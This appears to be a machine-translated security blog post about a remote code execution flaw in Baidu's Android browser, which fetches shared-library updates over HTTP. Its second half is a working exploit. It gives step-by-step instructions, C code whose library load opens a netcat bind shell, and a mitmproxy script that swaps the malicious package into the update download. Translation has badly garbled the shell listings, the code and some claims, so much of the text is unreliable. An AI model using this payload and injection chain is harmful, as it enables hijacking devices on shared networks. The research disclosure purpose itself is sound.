Analysis of remote code execution vulnerability in Baidu Android Browser

Analysis of remote code execution vulnerability in Baidu Android Browser

A few weeks ago, I found a remote code execution vulnerability in Baidu Android browser. At first, I wanted to talk about this topic in Infiltrate this year until I saw the following article published by XDA developers over the weekend.
Overview
The above article discusses the research results released by the Citizen Lab. Next I will talk about something interesting that I have seen.
"Both Windows and Android Baidu browsers use the code signature mechanism to protect the security of software updates. This means that malicious files in the program path can download and execute arbitrary code, which poses a huge risk to the system ."
In fact, as mentioned in articles on XDA and Citizen Lab, the insecure update mechanism of Android browser should be forced to use HTTPS. However, this does not completely solve the problem.
After all, paper cannot be wrapped up. I think users should understand the various risks of browsers. The results show that the latest version downloaded from Google play will also be affected, and the browser currently has about 10 million-50 million of the installation volume.
Install
As part of my analysis, I habitually use the mitmproxy agent to intercept traffic when installing the android browser (which needs to be reversed. When analyzing the installation traffic of Baidu Android browser, I found the following.

 

 
This browser downloads the apk file through HTTP:
GET http://s.mobile-global.baidu.com/mbrowser/guanxing/T5Update/res/54b2672d5353481ab5a762bdcd74977f.apk
If we open the request, we can see a JSON response package that provides the URL for apk download.
GET http://mobile-global.baidu.com/mbrowser/management/zeus_update.do? Si = 12.1.0.0 & so = 6.2.7.11 & zi =-& zo =-& api = 1 & pt = ma & co = US & la = en & ch = gp & av = 6.3.0.1 & sv = a_19 & pr = & n = {"d ": {"downUrl": "http://s.mobile-global.baidu.com/mbrowser/guanxing/T5Update/res/54b2672d5353481ab5a762bdcd74977f.apk", "force": "0", "freq": "365d", "md5": "54b2672d5353481ab5a762bdcd74977f", "remindCount ": "1", "size": "7636", "zi": "12.1.0.0", "zo": "6.2.7.11"}, "n": "8913ced893e7656ab190490d9bf96e9f ", "s": 1}
After the installation is complete, the following information is displayed:

 
What is T5 Engine? This is actually not important. It seems to be something to speed up Baidu browsers.
T5Update APK
We can use the following command to check the content in the T5Update APK (that is, the above "acceleration" apk:
Wget http://s.mobile-global.baidu.com/mbrowser/guanxing/T5Update/res/54b2672d5353481ab5a762bdcd74977f.apk--2016-02-27 12:56:15 -- http://s.mobile-global.baidu.com/mbrowser/guanxing/T5Update/res/54b2672d5353481ab5a762bdcd74977f.apkResolving S.mobile-global.baidu.com... 63.217.158.178Connecting tos.mobile-global.baidu.com | 63.217.158.178 |: 80... connected. HTTP request sent, awaiting response... 200 OKLength: 7819869 (7.5 M) [application/octet-stream] Saving: listen 100% [==================================================== ========================================================== =>] 7.46 M 2.10 MB/s in 3.8s2016-02-27 12:56:21 (1.95 MB/s) -unzip 'saved [7819869/7819869] unzip into Archive: 54b2672d5353481ab5a762bdcd74977f.apk Length Date Time Name -------- ---- 21704 03-24-15 libbaidujni. so 99576 03-24-15 libdumper. so 66748 03-24-15 listen 66752 03-24-15 libZeusPlatformImpl40.so 66752 03-24-15 then 66752 03-24-15 libZeusPlatformImpl42.so 66756 03-24-15 libZeusPlatformImpl43.so 66756 03-24-15 libZeusPlatformImpl443.so 66756 03-24-15 libZeusPlatformImpl44.so 66752 03-24-15 libZeusPlatform. so 14495444 03-24-15 libzeus. so 493810 03-24-15 com. baidu. zeus. jar -------- ------- 15644558 12 files

Therefore, Baidu browser downloads a zip package of shared library files through HTTP.
We will not draw any conclusions here. First, we need to figure out the location where these items are extracted and written. Now, let's take a look at the data directory of Baidu browser.
[Email protected]:/data/com. baidu. browser. inter/files # ls-ladrwx ------ please wait AFRequestCache-rw ------- please wait for 33 AF_INSTALLATIONdrwx ------ please wait until bbm-rw ------- please wait until 10453 ------ please wait too long cyberdrwx ------ Jun 2016-02-27 datadrwx ------ Jun homedrwx ------ Jun images-rwxr-xr-x ------ u0_a151 indrwx ------ u0_a151 indrwx ------ u0_a151 2-2-27 ------ pv2-27 pvdrwx ------ u0_a151 2016-02-27 ------ splu0_a151 u0_a151 splashdrwx ------ u0_a151 57 57 ------ splu0_a151 2-27 splashdrwx ------ u0_a151 u0_a151 2016-0 versiondrwx -- x u0_a151 u0_a151 2016-02-27 12:44 zeus
Based on the naming conventions of shared library files in the T5Update APK, the directory zeus looks like it can be explored:
[Email protected]:/data/com. baidu. browser. inter/files/zeus/libs # ls-la-rw-r -- u0_a151 u0_a151 1252704 com. baidu. zeus. dex-rw-r -- u0_a151 u0_a151 493810 com. baidu. zeus. jar-rw-r -- u0_a151 u0_a151 66752 libZeusPlatform. so-rw-r -- u0_a151 u0_a151 66748 hour-rw-r -- Far 66752 hour-rw-r -- u0_a151 u0_a151 66752 -rw-r -- u0_a151 u0_a151 66752 am-rw-r -- Far 66756 pm-rw-r -- u0_a151 u0_a151 66756 am-44- rw-r -- u0_a151 u0_a151 66756 libZeusPlatformImpl443.so-rw-r -- u0_a151 u0_a151 21704 libbaidujni. so-rw-r -- u0_a151 u0_a151 99576 libdumper. so-rw-r -- u0_a151 u0_a151 14495444 libzeus. so-rw-r -- u0_a151 u0_a151 17 2016-02-27 12:44 ver. dat
We can see that these items are decompressed and written to the/files/zeus/lib/directory. Now we can use exp.
Exp
The following describes how to use it:
Use the shared library file in the T5Update APK to create a zip package.
Replace one of the shared library files in the zip package with the shared library files that can execute malicious commands.
Man-in-the-middle hijacking of browser installation traffic.
Inject the zip download link to the response package of the download request of the T5Update APK.
Let's see which shared library is loaded when Baidu browser first initializes:
D/dalvikvm (21640): Trying to load lib/data/com. baidu. browser. inter/files/zeus/libs // libzeus. so 0x42775e38D/dalvikvm (21640): Added shared lib/data/com. baidu. browser. inter/files/zeus/libs // libzeus. so 0x42775e38
Obviously, libzeus. so is a good choice. We will replace it and use a zip package to execute arbitrary code:
# Include int JNI_OnLoad (JavaVM * vm, void * reserved) {system ("/data/local/tmp/busybox nc-ll-p 6666-e/system/bin/sh"); return JNI_VERSION_1_6 ;}
Now that the shared library file is constructed, a normal zip package is injected maliciously:
Unzip-l bad.apk Archive: bad.apk Length Date Time Name -------- ---- 493810 03-24-15 com. baidu. zeus. jar 21704 03-24-15 libbaidujni. so 99576 03-24-15 libdumper. so 9356 02-13-16 libzeus. so 66752 03-24-15 libZeusPlatform. so 66748 03-24-15 listen 66752 03-24-15 libZeusPlatformImpl40.so 66752 03-24-15 then 66752 03-24-15 libZeusPlatformImpl42.so 66756 03-24-15 libZeusPlatformImpl43.so 66756 03-24-15 libZeusPlatformImpl44.so66756 03-24-15 libZeusPlatformImpl443.so

 

Remember that libzeus. so is the shared library file we created. Here we use the mitmdump script to inject our malicious apk link into the download response package of the T5Update APK:
Import osfrom libmp roxyimport proxy, flowfrom libmp Roxy. protocol import httpfrom libmp Roxy. models import HTTPResponsefrom netlib. httpimport Headers def start (context, argv): context. log ("[*] Starting APKInjection! ") Def request (context, flow): if not flow. request. host = "s.mobile-global.baidu.com": return context. log ("[Baidu APK Injection] Target host: {0 }". format (flow. request. host) if flow. request. path. split (". ") [-1] =" apk ": context. log ("[Baidu APK Injection] Target injection point: {0 }". format (flow. request. path) response = HTTPResponse ("HTTP/1.0", 200, "OK", Headers (Content_Type = "application/octet-stream",), "PWNED ") # Inject our APK into the HTTP response try: with open ("bad.apk", "rb") as f: modified = f. read () response. content = modified response. headers ["Content-Length"] = str (len (modified) f. close () handle T IOError as e: raise e flow. reply (response)
Finally, we combine them:
Finally, I suggest you carefully use this browser before officially solving these security issues.